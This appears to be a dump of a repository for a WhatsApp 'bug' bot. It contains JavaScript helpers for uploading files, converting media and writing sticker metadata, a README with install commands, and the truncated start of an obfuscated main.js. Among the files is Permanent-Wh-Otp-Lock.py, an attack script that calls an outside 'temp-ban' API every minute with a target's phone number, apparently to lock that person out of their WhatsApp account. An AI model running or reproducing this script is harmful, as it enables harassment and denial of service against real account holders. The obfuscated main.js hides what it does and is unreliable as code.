| const array = []; 113 | Object.keys(_dir).forEach((i) => { 114 | array.push(_dir[i].id); 115 | }); 116 | return array; 117 | }; 118 | 119 | module.exports = { 120 | addPremiumUser, 121 | getPremiumExpired, 122 | getPremiumPosition, 123 | expiredCheck, 124 | checkPremiumUser, 125 | getAllPremiumUser, 126 | }; 127 | -------------------------------------------------------------------------------- /lib/uploader.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | let axios = require('axios') 11 | let BodyForm = require('form-data') 12 | let { fromBuffer } = require('file-type') 13 | let fetch = require('node-fetch') 14 | let fs = require('fs') 15 | let cheerio = require('cheerio') 16 | 17 | 18 | 19 | function TelegraPh (Path) { 20 | return new Promise (async (resolve, reject) => { 21 | if (!fs.existsSync(Path)) return reject(new Error("File not Found")) 22 | try { 23 | const form = new BodyForm(); 24 | form.append("file", fs.createReadStream(Path)) 25 | const data = await axios({ 26 | url: "https://telegra.ph/upload", 27 | method: "POST", 28 | headers: { 29 | ...form.getHeaders() 30 | }, 31 | data: form 32 | }) 33 | return resolve("https://telegra.ph" + data.data[0].src) 34 | } catch (err) { 35 | return reject(new Error(String(err))) 36 | } 37 | }) 38 | } 39 | 40 | async function UploadFileUgu (input) { 41 | return new Promise (async (resolve, reject) => { 42 | const form = new BodyForm(); 43 | form.append("files[]", fs.createReadStream(input)) 44 | await axios({ 45 | url: "https://uguu.se/upload.php", 46 | method: "POST", 47 | headers: { 48 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36", 49 | ...form.getHeaders() 50 | }, 51 | data: form 52 | }).then((data) => { 53 | resolve(data.data.files[0]) 54 | }).catch((err) => reject(err)) 55 | }) 56 | } 57 | 58 | function webp2mp4File(path) { 59 | return new Promise((resolve, reject) => { 60 | const form = new BodyForm() 61 | form.append('new-image-url', '') 62 | form.append('new-image', fs.createReadStream(path)) 63 | axios({ 64 | method: 'post', 65 | url: 'https://s6.ezgif.com/webp-to-mp4', 66 | data: form, 67 | headers: { 68 | 'Content-Type': `multipart/form-data; boundary=${form._boundary}` 69 | } 70 | }).then(({ data }) => { 71 | const bodyFormThen = new BodyForm() 72 | const $ = cheerio.load(data) 73 | const file = $('input[name="file"]').attr('value') 74 | bodyFormThen.append('file', file) 75 | bodyFormThen.append('convert', "Convert WebP to MP4!") 76 | axios({ 77 | method: 'post', 78 | url: 'https://ezgif.com/webp-to-mp4/' + file, 79 | data: bodyFormThen, 80 | headers: { 81 | 'Content-Type': `multipart/form-data; boundary=${bodyFormThen._boundary}` 82 | } 83 | }).then(({ data }) => { 84 | const $ = cheerio.load(data) 85 | const result = 'https:' + $('div#output > p.outfile > video > source').attr('src') 86 | resolve({ 87 | status: true, 88 | message: "Created By MRHRTZ", 89 | result: result 90 | }) 91 | }).catch(reject) 92 | }).catch(reject) 93 | }) 94 | } 95 | 96 | async function floNime(medianya, options = {}) { 97 | const { ext } = await fromBuffer(medianya) || options.ext 98 | var form = new BodyForm() 99 | form.append('file', medianya, 'tmp.'+ext) 100 | let jsonnya = await fetch('https://flonime.my.id/upload', { 101 | method: 'POST', 102 | body: form 103 | }) 104 | .then((response) => response.json()) 105 | return jsonnya 106 | } 107 | 108 | module.exports = { TelegraPh, UploadFileUgu, webp2mp4File, floNime } 109 | -------------------------------------------------------------------------------- /Permanent-Wh-Otp-Lock.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import subprocess 3 | import time 4 | import os 5 | from rich.console import Console 6 | from rich.panel import Panel 7 | 8 | 9 | os.system("clear") 10 | def otp_lock_banner(): 11 | console = Console() 12 | 13 | # Animated colorful text effect 14 | colors = ["red", "yellow", "green", "cyan", "blue", "magenta"] 15 | for color in colors: 16 | console.clear() 17 | panel = Panel(f''' 18 | [bold {color}]●[bold {colors[(colors.index(color) + 1) % len(colors)]}] ●[bold {colors[(colors.index(color) + 2) % len(colors)]}] ● 19 | .---. .----------- 20 | / \\ __ / ------ 21 | / / \\( )/ ----- 22 | ////// ' \\/ ` --- 23 | //// / // : : --- 24 | // / / /` '-- 25 | // //..\\\ 26 | 27 | ====UU====UU==== 28 | '\/\/' 29 | [bold {color}]●[bold {colors[(colors.index(color) + 1) % len(colors)]}] ●[bold {colors[(colors.index(color) + 2) % len(colors)]}] ====================================================== 30 | [bold white][[bold red]^[bold white]] [bold green] Author: Krishna & Ꭰᥲʀk Ꮮᴇᴀᴅᴇʀ \n[bold white][[bold red]^[bold white]] [bold green] Github: github.com/Mr-Krishna-90 \n[bold white][[bold red]^[bold white]] [bold green] Telegram: https://t.me/+GrRkWxyiROs4ZGU1 31 | [bold {color}] [bold {colors[(colors.index(color) + 1) % len(colors)]}] [bold {colors[(colors.index(color) + 2) % len(colors)]}]===================================================== ''', title="[bold red] Created By Krishna", style=color) 32 | console.print(panel) 33 | time.sleep(0.5) 34 | 35 | # API function 36 | def temp_ban_api(country_code, phone_number): 37 | try: 38 | api_url = f"https://api-bruxiintk.online/api/temp-ban?apikey=bx&ddi={country_code}&numero={phone_number}" 39 | response = requests.get(api_url) 40 | response.raise_for_status() # Raise an exception for HTTP errors 41 | if response.status_code == 200: 42 | return "\n\n[✓] Successfully done\n Completed..!!\n\nThank You For Using My Script!!\n Created By Krishna!!\n" 43 | else: 44 | return "Not done" 45 | except requests.exceptions.RequestException as e: 46 | return f"Error: {e}" 47 | 48 | def main(): 49 | otp_lock_banner() 50 | country_code = input("\n\033[90m[\033[91m?\033[90m]] \033[92m[X]Enter Your Country Code (e.g., +91): " '\n └─> ') 51 | if not country_code.startswith("+"): 52 | country_code = "+" + country_code 53 | 54 | phone_number = input("\n\033[90m[\033[91m?\033[90m]] \033[92m[?]Enter Your Mobile Number: " '\n └─> ') 55 | phone_number = phone_number.replace(" ", "") # Remove spaces 56 | 57 | while True: 58 | result = temp_ban_api(country_code, phone_number) 59 | print(result) 60 | time.sleep(60) # Delay for 1 minute 61 | 62 | # Function to print text with delay, bold, and color 63 | def print_with_delay_and_color(text, color_code, bold=True, delay_char=0.03): 64 | bold_code = "1;" if bold else "" # Set bold code if bold is True 65 | for char in text: 66 | print(f"\033[{bold_code}{color_code}m{char}", end='', flush=True) 67 | time.sleep(delay_char) 68 | print("\033[0m", end='', flush=True) 69 | 70 | # Function to print a line separator 71 | def print_separator(): 72 | print("\033[1;30m==============================\033[0m") 73 | 74 | # Define lines of text with color and bold settings 75 | lines = [ 76 | ("CALL ME Krishna..", "93", True), 77 | ("I AM FROM INDIA..", "92", True), 78 | ("I AM THE OWNER OF Ꭰᥲʀκ͢ㅤᏞᴇᴀᴅᴇʀ ✞ TEAM..", "94", True), 79 | ("HOPE YOU LIKE THIS SCRIPT..", "95", True), 80 | ("OOPS... I TALK A LOT SRY FOR THAT..", "96", True), 81 | ("Telegram Channel: ", "97", True), 82 | ("https://t.me/+GrRkWxyiROs4ZGU1", "91", False), 83 | ("Permanent WhatsApp Otp Lock..", "92", True), 84 | ("Wait For Start Tool..............", "90", True) 85 | ] 86 | 87 | # Print each line with specified color, bold, and delay 88 | for line, color_code, bold in lines: 89 | print_with_delay_and_color(line, color_code, bold) 90 | print() 91 | time.sleep(0.5) # Add delay between lines 92 | 93 | # Wait for 6 seconds 94 | time.sleep(6.0) 95 | 96 | # Function to redirect users to a Telegram channel 97 | def redirect_to_telegram_channel(channel_url): 98 | """ 99 | Redirects the user to a Telegram channel using the provided URL. 100 | 101 | Args: 102 | channel_url (str): The URL of the Telegram channel. 103 | """ 104 | try: 105 | subprocess.run(["am", "start", "-a", "android.intent.action.VIEW", "-d", channel_url], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 106 | except subprocess.CalledProcessError as e: 107 | print(f"Error: {e}") 108 | 109 | # URL of your Telegram channel 110 | telegram_channel_url = "https://t.me/+GrRkWxyiROs4ZGU1" 111 | 112 | # Redirect users to the Telegram channel 113 | redirect_to_telegram_channel(telegram_channel_url) 114 | 115 | if __name__ == "__main__": 116 | main() 117 | -------------------------------------------------------------------------------- /lib/myfunc2.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | var __importDefault = (this && this.__importDefault) || function (mod) { 11 | return (mod && mod.__esModule) ? mod : { "default": mod } 12 | } 13 | Object.defineProperty(exports, "__esModule", { value: true }) 14 | 15 | const axios = require("axios") 16 | const cheerio = require("cheerio") 17 | const { resolve } = require("path") 18 | const util = require("util") 19 | let BodyForm = require('form-data') 20 | let { fromBuffer } = require('file-type') 21 | //let fetch = require('node-fetch') 22 | let fs = require('fs') 23 | const child_process = require('child_process') 24 | const ffmpeg = require('fluent-ffmpeg') 25 | 26 | const {unlink } = require ('fs').promises 27 | 28 | 29 | exports.sleep = async (ms) => { 30 | return new Promise(resolve => setTimeout(resolve, ms)); 31 | } 32 | exports.fetchJson = async (url, options) => { 33 | try { 34 | options ? options : {} 35 | const res = await axios({ 36 | method: 'GET', 37 | url: url, 38 | headers: { 39 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36' 40 | }, 41 | ...options 42 | }) 43 | return res.data 44 | } catch (err) { 45 | return err 46 | } 47 | } 48 | exports.fetchBuffer = async (url, options) => { 49 | try { 50 | options ? options : {} 51 | const res = await axios({ 52 | method: "GET", 53 | url, 54 | headers: { 55 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36", 56 | 'DNT': 1, 57 | 'Upgrade-Insecure-Request': 1 58 | }, 59 | ...options, 60 | responseType: 'arraybuffer' 61 | }) 62 | return res.data 63 | } catch (err) { 64 | return err 65 | } 66 | } 67 | exports.webp2mp4File=async(path) =>{ 68 | return new Promise((resolve, reject) => { 69 | const form = new BodyForm() 70 | form.append('new-image-url', '') 71 | form.append('new-image', fs.createReadStream(path)) 72 | axios({ 73 | method: 'post', 74 | url: 'https://s6.ezgif.com/webp-to-mp4', 75 | data: form, 76 | headers: { 77 | 'Content-Type': `multipart/form-data; boundary=${form._boundary}` 78 | } 79 | }).then(({ data }) => { 80 | const bodyFormThen = new BodyForm() 81 | const $ = cheerio.load(data) 82 | const file = $('input[name="file"]').attr('value') 83 | bodyFormThen.append('file', file) 84 | bodyFormThen.append('convert', "Convert WebP to MP4!") 85 | axios({ 86 | method: 'post', 87 | url: 'https://ezgif.com/webp-to-mp4/' + file, 88 | data: bodyFormThen, 89 | headers: { 90 | 'Content-Type': `multipart/form-data; boundary=${bodyFormThen._boundary}` 91 | } 92 | }).then(({ data }) => { 93 | const $ = cheerio.load(data) 94 | const result = 'https:' + $('div#output > p.outfile > video > source').attr('src') 95 | resolve({ 96 | status: true, 97 | message: "Created By Eternity", 98 | result: result 99 | }) 100 | }).catch(reject) 101 | }).catch(reject) 102 | }) 103 | } 104 | 105 | exports.fetchUrl = async (url, options) => { 106 | try { 107 | options ? options : {} 108 | const res = await axios({ 109 | method: 'GET', 110 | url: url, 111 | headers: { 112 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36' 113 | }, 114 | ...options 115 | }) 116 | return res.data 117 | } catch (err) { 118 | return err 119 | } 120 | } 121 | 122 | exports.WAVersion = async () => { 123 | let get = await exports.fetchUrl("https://web.whatsapp.com/check-update?version=1&platform=web") 124 | let version = [get.currentVersion.replace(/[.]/g, ", ")] 125 | return version 126 | } 127 | 128 | exports.getRandom = (ext) => { 129 | return `${Math.floor(Math.random() * 10000)}${ext}` 130 | } 131 | 132 | exports.isUrl = (url) => { 133 | return url.match(new RegExp(/https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)/, 'gi')) 134 | } 135 | 136 | exports.isNumber = (number) => { 137 | const int = parseInt(number) 138 | return typeof int === 'number' && !isNaN(int) 139 | } 140 | exports.TelegraPh= (Path) =>{ 141 | return new Promise (async (resolve, reject) => { 142 | if (!fs.existsSync(Path)) return reject(new Error("File not Found")) 143 | try { 144 | const form = new BodyForm(); 145 | form.append("file", fs.createReadStream(Path)) 146 | const data = await axios({ 147 | url: "https://telegra.ph/upload", 148 | method: "POST", 149 | headers: { 150 | ...form.getHeaders() 151 | }, 152 | data: form 153 | }) 154 | return resolve("https://telegra.ph" + data.data[0].src) 155 | } catch (err) { 156 | return reject(new Error(String(err))) 157 | } 158 | }) 159 | } 160 | const sleepy = async (ms) => { 161 | return new Promise(resolve => setTimeout(resolve, ms)); 162 | } 163 | exports.buffergif = async (image) => { 164 | 165 | const filename = `${Math.random().toString(36)}` 166 | await fs.writeFileSync(`./XeonMedia/trash/${filename}.gif`, image) 167 | child_process.exec( 168 | `ffmpeg -i ./XeonMedia/trash/${filename}.gif -movflags faststart -pix_fmt yuv420p -vf "scale=trunc(iw/2)*2:trunc(ih/2)*2" ./XeonMedia/trash/${filename}.mp4` 169 | ) 170 | await sleepy(4000) 171 | 172 | var buffer5 = await fs.readFileSync(`./XeonMedia/trash/${filename}.mp4`) 173 | Promise.all([unlink(`./XeonMedia/video/${filename}.mp4`), unlink(`./XeonMedia/gif/${filename}.gif`)]) 174 | return buffer5 175 | } 176 | -------------------------------------------------------------------------------- /lib/exif.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | const fs = require('fs') 11 | const { tmpdir } = require("os") 12 | const Crypto = require("crypto") 13 | const ff = require('fluent-ffmpeg') 14 | const webp = require("node-webpmux") 15 | const path = require("path") 16 | 17 | 18 | async function imageToWebp (media) { 19 | 20 | const tmpFileOut = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 21 | const tmpFileIn = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.jpg`) 22 | 23 | fs.writeFileSync(tmpFileIn, media) 24 | 25 | await new Promise((resolve, reject) => { 26 | ff(tmpFileIn) 27 | .on("error", reject) 28 | .on("end", () => resolve(true)) 29 | .addOutputOptions([ 30 | "-vcodec", 31 | "libwebp", 32 | "-vf", 33 | "scale='min(320,iw)':min'(320,ih)':force_original_aspect_ratio=decrease,fps=15, pad=320:320:-1:-1:color=white@0.0, split [a][b]; [a] palettegen=reserve_transparent=on:transparency_color=ffffff [p]; [b][p] paletteuse" 34 | ]) 35 | .toFormat("webp") 36 | .save(tmpFileOut) 37 | }) 38 | 39 | const buff = fs.readFileSync(tmpFileOut) 40 | fs.unlinkSync(tmpFileOut) 41 | fs.unlinkSync(tmpFileIn) 42 | return buff 43 | } 44 | 45 | async function videoToWebp (media) { 46 | 47 | const tmpFileOut = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 48 | const tmpFileIn = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.mp4`) 49 | 50 | fs.writeFileSync(tmpFileIn, media) 51 | 52 | await new Promise((resolve, reject) => { 53 | ff(tmpFileIn) 54 | .on("error", reject) 55 | .on("end", () => resolve(true)) 56 | .addOutputOptions([ 57 | "-vcodec", 58 | "libwebp", 59 | "-vf", 60 | "scale='min(320,iw)':min'(320,ih)':force_original_aspect_ratio=decrease,fps=15, pad=320:320:-1:-1:color=white@0.0, split [a][b]; [a] palettegen=reserve_transparent=on:transparency_color=ffffff [p]; [b][p] paletteuse", 61 | "-loop", 62 | "0", 63 | "-ss", 64 | "00:00:00", 65 | "-t", 66 | "00:00:05", 67 | "-preset", 68 | "default", 69 | "-an", 70 | "-vsync", 71 | "0" 72 | ]) 73 | .toFormat("webp") 74 | .save(tmpFileOut) 75 | }) 76 | 77 | const buff = fs.readFileSync(tmpFileOut) 78 | fs.unlinkSync(tmpFileOut) 79 | fs.unlinkSync(tmpFileIn) 80 | return buff 81 | } 82 | 83 | async function writeExifImg (media, metadata) { 84 | let wMedia = await imageToWebp(media) 85 | const tmpFileIn = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 86 | const tmpFileOut = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 87 | fs.writeFileSync(tmpFileIn, wMedia) 88 | 89 | if (metadata.packname || metadata.author) { 90 | const img = new webp.Image() 91 | const json = { "sticker-pack-id": `https://github.com/nazedev/naze`, "sticker-pack-name": metadata.packname, "sticker-pack-publisher": metadata.author, "emojis": metadata.categories ? metadata.categories : [""] } 92 | const exifAttr = Buffer.from([0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x41, 0x57, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00]) 93 | const jsonBuff = Buffer.from(JSON.stringify(json), "utf-8") 94 | const exif = Buffer.concat([exifAttr, jsonBuff]) 95 | exif.writeUIntLE(jsonBuff.length, 14, 4) 96 | await img.load(tmpFileIn) 97 | fs.unlinkSync(tmpFileIn) 98 | img.exif = exif 99 | await img.save(tmpFileOut) 100 | return tmpFileOut 101 | } 102 | } 103 | 104 | async function writeExifVid (media, metadata) { 105 | let wMedia = await videoToWebp(media) 106 | const tmpFileIn = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 107 | const tmpFileOut = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 108 | fs.writeFileSync(tmpFileIn, wMedia) 109 | 110 | if (metadata.packname || metadata.author) { 111 | const img = new webp.Image() 112 | const json = { "sticker-pack-id": `https://github.com/nazedev/naze`, "sticker-pack-name": metadata.packname, "sticker-pack-publisher": metadata.author, "emojis": metadata.categories ? metadata.categories : [""] } 113 | const exifAttr = Buffer.from([0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x41, 0x57, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00]) 114 | const jsonBuff = Buffer.from(JSON.stringify(json), "utf-8") 115 | const exif = Buffer.concat([exifAttr, jsonBuff]) 116 | exif.writeUIntLE(jsonBuff.length, 14, 4) 117 | await img.load(tmpFileIn) 118 | fs.unlinkSync(tmpFileIn) 119 | img.exif = exif 120 | await img.save(tmpFileOut) 121 | return tmpFileOut 122 | } 123 | } 124 | 125 | async function writeExif (media, metadata) { 126 | let wMedia = /webp/.test(media.mimetype) ? media.data : /image/.test(media.mimetype) ? await imageToWebp(media.data) : /video/.test(media.mimetype) ? await videoToWebp(media.data) : "" 127 | const tmpFileIn = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 128 | const tmpFileOut = path.join(tmpdir(), `${Crypto.randomBytes(6).readUIntLE(0, 6).toString(36)}.webp`) 129 | fs.writeFileSync(tmpFileIn, wMedia) 130 | 131 | if (metadata.packname || metadata.author) { 132 | const img = new webp.Image() 133 | const json = { "sticker-pack-id": `https://github.com/nazedev/naze`, "sticker-pack-name": metadata.packname, "sticker-pack-publisher": metadata.author, "emojis": metadata.categories ? metadata.categories : [""] } 134 | const exifAttr = Buffer.from([0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x41, 0x57, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00]) 135 | const jsonBuff = Buffer.from(JSON.stringify(json), "utf-8") 136 | const exif = Buffer.concat([exifAttr, jsonBuff]) 137 | exif.writeUIntLE(jsonBuff.length, 14, 4) 138 | await img.load(tmpFileIn) 139 | fs.unlinkSync(tmpFileIn) 140 | img.exif = exif 141 | await img.save(tmpFileOut) 142 | return tmpFileOut 143 | } 144 | } 145 | 146 | module.exports = { imageToWebp, videoToWebp, writeExifImg, writeExifVid, writeExif } 147 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 |

ꪶBADBOI-v4 BUGꫂ

4 |

5 | 6 |

7 | 8 |

9 | BADBOI-v4 𝘽𝙤𝙩 Multi Device is a whatsapp bot created by BADBOI using Baileys and Nodejs. Dont forget to give a star bro. 10 |

11 |

12 | Typing SVG 13 |

14 | # ```Bot Info``` 15 |

16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 |    24 | 25 | 26 | ### If you want to deploy somewhere else, upload your creds.json in session folder after getting pair code on replit or render. 27 | 28 | ### 1. Click Here to fork BADBOI-v4 29 | ## `Generate Pair Code For Session` 30 | 31 | [`Badboi-v4 Pairing Using Render`](https://creds-json-paring-generator-by-badboi-2.onrender.com) 32 | 33 | [`Badboi-v4 Pairing using Replit`](https://replit.com/@samjame088/Xeon-PairCode-1) 34 | 35 | 36 | ### . Click Here to Deploy on Panel 37 | 38 | ### . Click Here to Deploy on TOYSTACK AI 39 | 40 | # Instalasi 41 | ## Heroku Buildpack 42 | ```bash 43 | heroku/nodejs 44 | ``` 45 | ``` 46 | https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest 47 | ``` 48 | ``` 49 | https://github.com/clhuang/heroku-buildpack-webp-binaries.git 50 | ``` 51 | 52 | *Add your Creds.json to Session file 53 | * Create a new app at [Heroku](https://id.heroku.com/login) 54 | * Add Build packs 55 | * Connect your heroku with your github 56 | * Locate BADBOI-v4-BUG 57 | * Now deploy. 58 | * Start the Worker 59 | * Enjoy the Bot. 60 | 61 | ### 4. 66 | Render

67 | 68 | ★ Now Deploy 69 |
70 | DEPLOY

71 | 72 |
73 | 74 | #### COPY THESE COMMANDS AND PASTE IF YOU TRYING TO DEPLOY [BADBOI-v4](https://github.com/BADBOI-v1/BADBOI-v4) ON ANY TERMINAL 75 | ``` 76 | sudo apt -y update && sudo apt -y upgrade 77 | ``` 78 | ``` 79 | sudo apt -y install git ffmpeg curl 80 | ``` 81 | ``` 82 | curl -fsSL https://deb.nodesource.com/setup_20.x -o nodesource_setup.sh 83 | ``` 84 | ``` 85 | sudo -E bash nodesource_setup.sh 86 | ``` 87 | ``` 88 | sudo apt-get install -y nodejs 89 | ``` 90 | ``` 91 | sudo npm install -g yarn 92 | ``` 93 | ``` 94 | sudo yarn global add pm2 95 | ``` 96 | ``` 97 | git clone https://github.com/type-your-username-here/BADBOI-v4 98 | ``` 99 | ``` 100 | cd BADBOI-v4 101 | ``` 102 | ``` 103 | yarn install 104 | ``` 105 | ``` 106 | npm start 107 | ``` 108 | 109 | 110 | 111 |
112 | 113 | 114 | 115 | # Termux Deployment 116 | ``` 117 | termux-setup-storage 118 | ``` 119 | ``` 120 | apt update 121 | ``` 122 | ``` 123 | apt upgrade 124 | ``` 125 | ``` 126 | pkg update && pkg upgrade 127 | ``` 128 | ``` 129 | pkg install bash 130 | ``` 131 | ``` 132 | pkg install libwebp 133 | ``` 134 | ``` 135 | pkg install git -y 136 | ``` 137 | ``` 138 | pkg install nodejs -y 139 | ``` 140 | ``` 141 | pkg install ffmpeg -y 142 | ``` 143 | ``` 144 | pkg install wget 145 | ``` 146 | ``` 147 | pkg install yarn 148 | ``` 149 | ``` 150 | git clone (copy and paste your forked repo link not mine to save changes your changes) 151 | ``` 152 | ``` 153 | cd BADBOI-v4 154 | ``` 155 | ``` 156 | yarn install 157 | ``` 158 | ``` 159 | npm start 160 | ``` 161 | 162 | - If you want Command For 24/7 (might no work) 163 | ```js 164 | npm i -g forever && forever index.js && forever save && forever logs 165 | ``` 166 |
167 | 168 | 169 |
170 |

🛡️ Windows Cmd & Vs 🛡️

171 | 172 | - [Download ffmpeg](https://ffmpeg.org/download.html#build-windows) and set the path 173 | - [Download wget](https://eternallybored.org/misc/wget/releases/) and set the path 174 | - [Download Node.js](https://nodejs.org/en/download/) 175 | - [Download Git](https://git-scm.com/downloads) 176 | - [Download Libwebp](https://developers.google.com/speed/webp/download) 177 | 178 | ```cmd 179 | > git clone https://github.com/BADBOI-v1/BADBOI-v4.git 180 | ``` 181 | ``` 182 | > cd BADBOI-v4 183 | ``` 184 | ``` 185 | > yarn install 186 | ``` 187 | ``` 188 | > npm start 189 | ``` 190 | 191 | 192 | ------- 193 | ## ```YOUTUBE CHANNEL FOR TUTORIALS``` 194 | 195 | - [ Click ](https://youtube.com/@BADBOI-k2i?si=1_Ae2h9Kl9IbAo7E) 196 | 197 | 198 | 199 | ## ```Connect With Me``` 200 |
201 |

202 | 203 | 204 | 205 | Whatsapp

206 | 207 | ## 🎯 Authors 🎯 208 |
209 | 210 | | [![Tᴀɪʀᴀ Mᴀᴋɪɴᴏ](https://github.com/BADBOI-v1.png?size=150)](https://github.com/BADBOI-v1) | 211 | |----| 212 | | [ Badboi Hacker](https://github.com/BADBOI-v1) | 213 | | Developer | 214 | 215 |
216 |
217 | 218 | | [![𝕷𝖔𝖗𝖉 𝕹𝖔 𝕹𝖆𝖒𝖊](https://github.com/Anime-King01.png?size=150)](https://github.com/Anime-King01) | 219 | |----| 220 | | [ Lord No Name](https://github.com/Anime-King01) | 221 | | Co-Developer | 222 | 223 |
224 | 225 |
226 | 227 |

Reminder 228 |

229 | 230 | - This bot is not made by `WhatsApp Inc.` So misusing the bot might `ban` your `WhatsApp account!`(Though your WhatsApp account can be unbanned only once.) 231 | - I am not responsible for banning your account. 232 | - Use at your own risk by keeping this warning in mind. 233 | 234 | 235 | 236 | ## `Special Thanks To` 237 | 238 | * [`📕 Lord No Name!!`](https://github.com/Anime-King01) 239 | 240 | * ⧉ 𝐓𝐇𝐀𝐍𝐊𝐒 𝐅𝐎𝐑 𝐓𝐇𝐄 𝐒𝐔𝐏𝐏𝐎𝐑𝐓 ⧉ 241 | * BADBOI HACKER IS ACTIVE 😂😂😂 242 | -------------------------------------------------------------------------------- /main.js: -------------------------------------------------------------------------------- 1 | const _0x5bc89b=_0xb02e;(function(_0x4a4cc5,_0x181edd){const _0x2b624a=_0xb02e,_0x6b094b=_0x4a4cc5();while(!![]){try{const _0x47ef83=-parseInt(_0x2b624a(0x12e))/0x1+-parseInt(_0x2b624a(0x197))/0x2*(parseInt(_0x2b624a(0x154))/0x3)+-parseInt(_0x2b624a(0x16e))/0x4+-parseInt(_0x2b624a(0x19e))/0x5+parseInt(_0x2b624a(0x14b))/0x6*(-parseInt(_0x2b624a(0x15c))/0x7)+parseInt(_0x2b624a(0x19d))/0x8+parseInt(_0x2b624a(0x180))/0x9*(parseInt(_0x2b624a(0x13b))/0xa);if(_0x47ef83===_0x181edd)break;else _0x6b094b['push'](_0x6b094b['shift']());}catch(_0x479ea0){_0x6b094b['push'](_0x6b094b['shift']());}}}(_0x37f2,0xae0c4),require(_0x5bc89b(0x18f)));const pino=require(_0x5bc89b(0x195)),{Boom}=require(_0x5bc89b(0x12c)),fs=require('fs'),chalk=require(_0x5bc89b(0x132)),FileType=require(_0x5bc89b(0x162)),path=require('path'),axios=require(_0x5bc89b(0x181)),PhoneNumber=require(_0x5bc89b(0x121)),{imageToWebp,videoToWebp,writeExifImg,writeExifVid}=require(_0x5bc89b(0x14c)),{smsg,isUrl,generateMessageTag,getBuffer,getSizeMedia,fetch,await,sleep,reSize}=require(_0x5bc89b(0x166)),{default:XeonBotIncConnect,delay,PHONENUMBER_MCC,makeCacheableSignalKeyStore,useMultiFileAuthState,DisconnectReason,fetchLatestBaileysVersion,generateForwardMessageContent,prepareWAMessageMedia,generateWAMessageFromContent,generateMessageID,downloadContentFromMessage,makeInMemoryStore,jidDecode,proto,Browsers}=require(_0x5bc89b(0x145)),NodeCache=require(_0x5bc89b(0x12f)),Pino=require(_0x5bc89b(0x195)),readline=require(_0x5bc89b(0x11d)),{parsePhoneNumber}=require(_0x5bc89b(0x192)),makeWASocket=require(_0x5bc89b(0x145))['default'],store=makeInMemoryStore({'logger':pino()[_0x5bc89b(0x137)]({'level':_0x5bc89b(0x157),'stream':'store'})});let phoneNumber=_0x5bc89b(0x143),owner=JSON['parse'](fs['readFileSync'](_0x5bc89b(0x1a4)));const pairingCode=!!phoneNumber||process[_0x5bc89b(0x15b)][_0x5bc89b(0x168)]('--pairing-code'),useMobile=process[_0x5bc89b(0x15b)][_0x5bc89b(0x168)](_0x5bc89b(0x172)),rl=readline[_0x5bc89b(0x138)]({'input':process[_0x5bc89b(0x17a)],'output':process[_0x5bc89b(0x11e)]}),question=_0x5870f4=>new Promise(_0x1d9461=>rl[_0x5bc89b(0x193)](_0x5870f4,_0x1d9461));function _0xb02e(_0x43d376,_0x1d7396){const _0x37f236=_0x37f2();return 